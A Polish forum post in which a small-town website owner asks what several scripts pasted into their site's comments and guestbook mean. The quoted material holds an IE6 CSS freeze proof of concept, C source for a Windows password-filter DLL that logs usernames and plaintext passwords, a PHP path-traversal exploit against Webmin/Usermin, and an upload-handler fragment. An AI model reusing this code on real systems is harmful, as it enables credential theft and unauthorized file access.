
Robie strone konkurencyjna dla mojego miasta i jest pare osob zainteresowanych nia!
Ktos proboje cos zrobic, zostaja wklejane kody php na moja strone!!
Oto jeden kod wklejony w systemie newsow w komentarzach:
<!-- # Internet Explorer <= 6 DoS vulnerability # # tested IE6 on XPx64 and IE 5.1, 5.5 and 6 on XP SP2 (eng) # all versions are vulnerable # ie 7 (beta 2 and 3) are not affected # # this malicious css code freezes/ dos the internet explorer # prior version 7 and stops any user interaction # the absolute size of the div element does not matter but has # to be higher than the input's one # # 07/14/2006 by jonasschaub at gmail.com # <a href="http://jonas.elunic.de/blog/index.php/2006/07/14/ie-freeze-bug/" target="_blank">http://jonas.elunic.de/blog/index.php/2006.../ie-freeze-bug/</a> # --> <style type="text/css"> input { width:35px; float:left; } </style> <div style="width:50px;"> <span> <span style="position:relative;"> <input /> </span> <input /> <input /> </span> </div> #include <windows.h> #include <stdio.h> #include <stdlib.h> struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:temppwdchange.out", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUG H, 0); WriteFile(fh, "InitializeChangeNotify startedn", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify ( struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd ) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %xn", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } -----------------------end of FPNWCLNT.c---------------------------------- -- <?php /* Name : Webmin / Usermin Arbitrary File Disclosure Vulnerability Date : 2006-06-30 Patch : update to version 1.290 Advisory : <a href="http://securitydot.net/vuln/exploits/vulnerabilities/articles/17885/vuln.html" target="_blank">http://securitydot.net/vuln/exploits/vulne...17885/vuln.html</a> Coded by joffer , <a href="http://securitydot.net" target="_blank">http://securitydot.net</a> */ $host = $argv[1]; $port = $argv[2]; $http = $argv[3]; $file = $argv[4]; // CHECKING THE INPUT if($host != "" && $port != "" && $http != "" && $file != "") { $z = "/..%01"; for ($i=0;$i<60;$i++) { $z.="/..%01"; } $target = $http."://".$host.":".$port."/unauthenticated".$z."/".$file.""; // INITIALIZING CURL SESSION TO THE TARGET $ch = curl_init(); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $target); curl_setopt ($ch, CURLOPT_TIMEOUT, '10'); curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,FALSE ); $content = curl_exec($ch); curl_close ($ch); // CLOSING CURL // ECHOING THE CONTENT OF THE $FILE echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> } else { // IF INPUT IS NOT CORRECT DISPLAY THE README echo "Coded by joffer , <a href="http://securitydot.netn";;" target="_blank">http://securitydot.netn";;</a> } ?> <?php $file = $HTTP_POST_FILES["plik"]["tmp_name"]; $zapisz_jako = $HTTP_POST_FILES["plik"]["name"]; } ?>
Moaj strona: http://www.miasto-glubczyce.info/index.php...t=&oms=news
Głowna: http://www.miasto-glubczyce.info/
http://www.miasto-glubczyce.info/?oms=ksiega_gosci
W ksiedze tez wpisano jakis kod, dlatego jest error.
HELP

Co te skrypty znacza? Nie znam php, mam 3 rozne IP z ktorych zostaly wysylane kody, nie wiem czy jest to cos powaznego i czy zawiadamiac odpowiednich ludzi...
Dzieku z gory za analize.
Pozdrawiam